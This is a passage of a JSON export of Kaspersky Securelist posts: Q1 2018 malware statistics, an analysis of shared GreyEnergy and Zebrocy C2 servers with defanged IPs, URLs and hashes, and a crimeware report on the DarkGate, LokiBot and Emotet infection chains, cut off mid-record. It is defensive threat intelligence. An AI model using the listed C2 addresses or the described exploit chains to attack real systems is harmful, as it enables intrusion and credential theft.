In Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years — browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that it can only be compared to the number of Adobe Flash vulnerabilities found in the past.
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.

_Distribution of exploits used in attacks by type of application attacked, Q1 2018_

The most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) — a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.

As for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits.
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.

Large-scale use of network exploits for vulnerabilities patched by the MS17-010 update (those exploiting [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.

## Malicious programs online (attacks via web resources)

_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Online threats in the financial sector

#### Q1 events

In early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is the fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>).
As a result, the malware was rebranded FriedEx.

Q1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organization to criminal accounts, and inflate bank balances, with money mules being used to collect the proceeds.

#### Financial threat statistics

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._

In Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.

_Number of unique users attacked by financial malware, Q1 2018_

##### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

_**Geography of banking malware attacks in Q1 2018 (percentage of attacked users)**_

**TOP 10 countries by percentage of attacked users**

| | Country* | % of users attacked** |
|---|---|---|
| 1 | Cameroon | 2.1 |
| 2 | Germany | 1.7 |
| 3 | South Korea | 1.5 |
| 4 | Libya | 1.5 |
| 5 | Togo | 1.5 |
| 6 | Armenia | 1.4 |
| 7 | Georgia | 1.4 |
| 8 | Moldova | 1.2 |
| 9 | Kyrgyzstan | 1.2 |
| 10 | Indonesia | 1.1 |

_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data._
_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._
_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._

#### TOP 10 banking malware families

**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**

| | Name | Verdicts* | % of attacked users** |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 28.0% |
| 2 | Nymaim | Trojan.Win32.Nymaim | 20.3% |
| 3 | Caphaw | Backdoor.Win32.Caphaw | 15.2% |
| 4 | SpyEye | Backdoor.Win32.SpyEye | 11.9% |
| 5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% |
| 6 | Emotet | Backdoor.Win32.Emotet | 2.4% |
| 7 | Neurevt | Trojan.Win32.Neurevt | 2.3% |
| 8 | Shiz | Backdoor.Win32.Shiz | 2.1% |
| 9 | Gozi | Trojan.Win32.Gozi | 1.9% |
| 10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% |

_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._
_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._

In Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.

### Cryptoware programs

#### Q1 events

Q1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:

 * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)
 * Ransom demand in the cryptocurrency Dash

GandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.

The RaaS (ransomware as a service) distribution model continues to attract malware developers.
In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by "affiliate program" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.

One notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.

#### Number of new modifications

In Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.

_Number of new cryptoware modifications, Q2 2017 – Q1 2018_

The number of new modifications fell sharply against previous quarters.
The trend indicates that cybercriminals using this type of malware are becoming less active.

#### Number of users attacked by Trojan cryptors

During the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.

_Number of unique users attacked by cryptors, Q1 2018_

#### Geography of attacks

**TOP 10 countries attacked by Trojan cryptors**

| | Country* | % of users attacked by cryptors** |
|---|---|---|
| 1 | Uzbekistan | 1.12 |
| 2 | Angola | 1.11 |
| 3 | Vietnam | 1.04 |
| 4 | Venezuela | 0.95 |
| 5 | Indonesia | 0.95 |
| 6 | Pakistan | 0.93 |
| 7 | China | 0.87 |
| 8 | Azerbaijan | 0.75 |
| 9 | Bangladesh | 0.70 |
| 10 | Mongolia | 0.64 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._
_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._

The makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.

Despite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second.
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.

**TOP 10 most widespread cryptor families**

| | Name | Verdicts* | % of attacked users** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 |
| 2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 |
| 3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 |
| 4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 |
| 6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 |
| 7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 |
| 8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 |
| 9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 |
| 10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 |

_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._
_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._

This quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format.
Statistics show that a new modification detected in December immediately began to attack user computers.

The remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.

### Countries that are sources of web-based attacks: TOP 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q1 2018, Kaspersky Lab solutions blocked **796,806,112** attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.

_Distribution of web attack sources by country, Q1 2018_

This quarter, Web Anti-Virus was most active on resources located in the US (39.14%).
Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| | **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ 
\n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| | **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. 
Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-24T16:53:08", "description": "\n\nIn October 2018, ESET published a[ report](<https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf>) describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.\n\n[Kaspersky Lab ICS CERT](<https://ics-cert.kaspersky.com/>) has identified an overlap between GreyEnergy and a Sofacy subset called [\"Zebrocy\"](<https://securelist.com/a-slice-of-2017-sofacy-activity/83930/>). The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. 
Zebrocy's targets are widely spread across the Middle East, Europe and Asia and the targets' profiles are mostly government-related.\n\nBoth sets of activity used the same servers at the same time and targeted the same organization.\n\n## **Details**\n\n### **Servers**\n\nIn our private APT Intel report from July 2018 \"Zebrocy implements new VBA anti-sandboxing tricks\", details were provided about different Zebrocy C2 servers, including **193.23.181[.]151**.\n\nIn the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \neae0b8997c82ebd93e999d4ce14dedf5 \na5cbf5a131e84cd2c0a11fca5ddaa50a \nc9e1b0628ac62e5cb01bf1fa30ac8317\n\nThe URL used to download additional data looks as follows:\n\nhxxp://**193.23.181**[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nThis same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a [FireEye report](<https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html>). Details on this attachment are as follows:\n\n * The file (11227eca89cc053fb189fac3ebf27497) with the name \"Seminar.rtf\" exploited CVE-2017-0199\n * \"Seminar.rtf\" downloaded a second stage document from: hxxp://**193.23.181[.]151**/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)\n * The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://**193.23.181[.]151**/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf\n\nAnother server we detected that was used both by Zebrocy and by GreyEnergy is **185.217.0[.]124**. 
Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named \"Seminar.rtf\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png>)\n\n_\"Seminar.rtf\", a GreyEnergy decoy document_\n\nThis document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:\n\n\\\\\\**185.217.0[.]124**\\Doc\\Seminar\\Seminar_2018_1.AO-A\n\nThe following Zebrocy samples use this server as C2:\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \n3803af6700ff4f712cd698cee262d4ac \ne3100228f90692a19f88d9acb620960d\n\nThey retrieve additional data from the following URL:\n\nhxxp://**185.217.0[.]124**/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nIt is worth noting that at least two samples from the above list use both **193.23.181[.]151** and **185.217.0[.]124** as C2s.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png>)\n\n_Hosts associated with GreyEnergy and Zebrocy_\n\n### **Attacked company**\n\nAdditionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. 
One of them was attacked in June 2018.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png>)\n\n_GreyEnergy and Zebrocy overlap_\n\n### **Attack timeframe**\n\nA spearphishing document entitled 'Seminar.rtf', which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png>)\n\n_'(28.06.18) Izmeneniya v prikaz PK.doc' Zebrocy decoy document translation: _ \n_'Changes to order, Republic of Kazakhstan'_\n\nThe two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:\n\n * 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018\n * 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018\n\n## **Conclusions**\n\nThe GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim's networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.\n\nThough no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. 
In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship's existence.\n\nFor more information about APT reports please contact: intelreports@kaspersky.com \n\nFor more information about ICS threats please contact: [ics-cert@kaspersky.com](<mailto:cs-cert@kaspersky.com>)", "cvss3": {}, "published": "2019-01-24T09:00:47", "type": "securelist", "title": "GreyEnergy\u2019s overlap with Zebrocy", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2019-01-24T09:00:47", "id": "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "href": "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-12T04:35:12", "description": "\n\n## Introduction\n\nThe malware landscape keeps evolving. New families are born, while others disappear. Some families are short-lived, while others remain active for quite a long time. In order to follow this evolution, we rely both on samples that we detect and our monitoring efforts, which cover botnets and underground forums.\n\nWhile doing so, we found new [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) samples, a new loader dubbed "DarkGate", and a new [LokiBot infostealer](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-266a>) campaign. 
We described all three in private reports, from which this post contains an excerpt.\n\nIf you want to learn more about our crimeware reporting service, please contact us at [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).\n\n## DarkGate\n\nIn June 2023, a well-known malware developer posted an advertisement on a popular dark web forum, boasting of having developed a loader that he had been working on for more than 20,000 hours since 2017. Some of the main features, which went beyond typical downloader functionality, supposedly included the following:\n\n * Hidden VNC\n * Windows Defender exclusion\n * Browser history stealer\n * Reverse proxy\n * File manager\n * Discord token stealer\n\nThe full list of the touted capabilities is available in our private report.\n\nThe sample we obtained is missing some of these features, but that doesn't mean much, as they are enabled or disabled in the builder anyway. We were, however, able to reconstruct the infection chain, which consists of four stages, all the way to loading the final payload: DarkGate itself.\n\n 1. **VBS downloader script**: The script is fairly simple. It sets several environment variables to obfuscate subsequent command invocations. Two files (Autoit3.exe and script.au3) are then downloaded from the C2, and Autoit3.exe is executed with script.au3 as an argument.\n 2. **AutoIT V3 script**: AutoIT V3 is a BASIC-like freeware scripting language, which is often used by malware authors, as it can simulate keystrokes and mouse movements, among other things. The script that is executed is obfuscated, but ultimately allocates memory to the embedded shellcode and finally executes the shellcode.\n 3. **Shellcode**: The shellcode is pretty straightforward: it constructs a PE file in the memory, resolves imports dynamically and transfers control to it.\n 4. 
**DarkGate executor** (the PE file constructed by the shellcode): The executor loads the script.au3 file into the memory and locates an encrypted blob within the script. The encrypted blob is then decrypted (using an XOR key and a final NOT operation). This results in a PE file, whose import table is dynamically resolved. The final result is the DarkGate loader.\n\nThe DarkGate loader has several global variables, actually a Delphi TStringList, comprising 17 variables that describe the core functionality of the malware:\n\n 1. Variable that is set if an AV is found\n 2. Variable that is set if a virtual environment is found\n 3. Variable that is set if a Xeon processor is found\n 4. C2 port number\n\nThe full list of variables is available in our private report. The core functionality does not include malware loading, which is implemented in a separate module.\n\nWhat also stands out is the way strings are encrypted. Each string is encrypted with a unique key and a custom version of Base64 encoding using a custom character set.\n\n## LokiBot\n\nLokiBot is an infostealer that first surfaced in 2016 and remains active today. It is designed to steal credentials from various applications, such as browsers, FTP clients and others. Recently, we detected a phishing campaign targeting cargo ship companies that drops LokiBot.\n\nIn the cases we investigated, the victims received an email appearing to come from a business contact and stating port expenses that needed to be paid. Attached to the email was an Excel document. As expected, when opening the document the user was asked to enable macros. However, this was a fake warning, as the document did not contain any macros, trying to exploit [CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) instead.\n\nThat vulnerability makes it possible to open a remote document by providing a link. 
This results in downloading an RTF document, which in turn exploits another vulnerability, namely [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>). By exploiting this other vulnerability, LokiBot is downloaded and executed.\n\nOnce executed, it collects credentials from various sources and saves them into a buffer inside the malware, after which it sends them to the C2. Data is sent via POST requests compressed with APLib. After sending out system information, the malware listens for additional C2 commands. These commands can be used to download additional malware, run a keylogger, and so on.\n\n## Emotet\n\nEmotet is a notorious botnet that, despite [being taken down](<https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action>) in 2021, resurfaced later. In their recent wave of attacks, they jumped on the OneNote infection bandwagon, sending emails with malicious OneNote files. Opening one of these displays an image similar to the one below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154150/Crimeware_report_Emotet_LokiBot_and_DarkGate_01.png>)\n\nEmotet OneNote decoy document\n\nClicking on the view button executes the embedded and obfuscated malicious VBScript. The deobfuscated code is fairly simple.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154229/Crimeware_report_Emotet_LokiBot_and_DarkGate_02.png>)\n\nDeobfuscated downloader script\n\nAs one can see, there are several sites containing the payload. The script tries each of them until it succeeds, and then saves the payload, a DLL, in the temp directory, executing it with regsvc32.exe. 
The executed DLL then loads a resource (LXGUM) from its resource section and decrypts it with a simple rolling XOR algorithm as illustrated below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154317/Crimeware_report_Emotet_LokiBot_and_DarkGate_03.png>)\n\nResource decryption code\n\nThe decrypted payload is actually shellcode that does a typical import by hash. Two of the resolved functions are LdrLoadDll and LdrGetProcedureAddress, frequently used by malware authors to evade dynamic analysis of well-known APIs: LoadLibrary and GetProcAddress in this case. Next, memory is allocated, and a blob (a PE file) from the resource section is written to the allocated memory, which is the final Emotet payload. DLL dependencies are resolved, and the Import Address Table (IAT) is reconstructed. The shellcode then overwrites the DOS header of the PE file, in order to make it more difficult for EDR solutions to detect the binary in the memory. Finally, Emotet is executed.\n\nThe Emotet payload itself remains the same as in the previous waves of attacks.\n\n## Conclusion\n\nMalware continuously evolves, and TTPs change, hindering detection. Besides, it can be difficult for an organization to decide which type of malware threat to defend from first. Intelligence reports can help you to identify the threats relevant to your business and to stay protected against these. 
If you want to keep up to date on the latest TTPs used by criminals, or if you have questions about our private reports, reach out to us at [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).\n\n## Indicators of compromise (MD5s)\n\nLokiBot \n[31707f4c58be2db4fc43cba74f22c9e2](<https://opentip.kaspersky.com/31707f4c58be2db4fc43cba74f22c9e2/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[2c5cf406f3e4cfa448b167751eaea73b](<https://opentip.kaspersky.com/2c5cf406f3e4cfa448b167751eaea73b/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\nDarkGate \n[1B9E9D90136D033A52D2C282503F33B7](<https://opentip.kaspersky.com/1B9E9D90136D033A52D2C282503F33B7/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[149DA23D732922B04F82D634750532F3](<https://opentip.kaspersky.com/149DA23D732922B04F82D634750532F3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\nEmotet \n[238f7e8cd973a386b61348ab2629a912](<https://opentip.kaspersky.com/238f7e8cd973a386b61348ab2629a912/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[df3ee4fb63c971899e15479f9bca6853](<https://opentip.kaspersky.com/df3ee4fb63c971899e15479f9bca6853/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-08-03T10:00:32", "type": "securelist", "title": "What\u2019s happening in the world of crimeware: Emotet, DarkGate and LokiBot", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
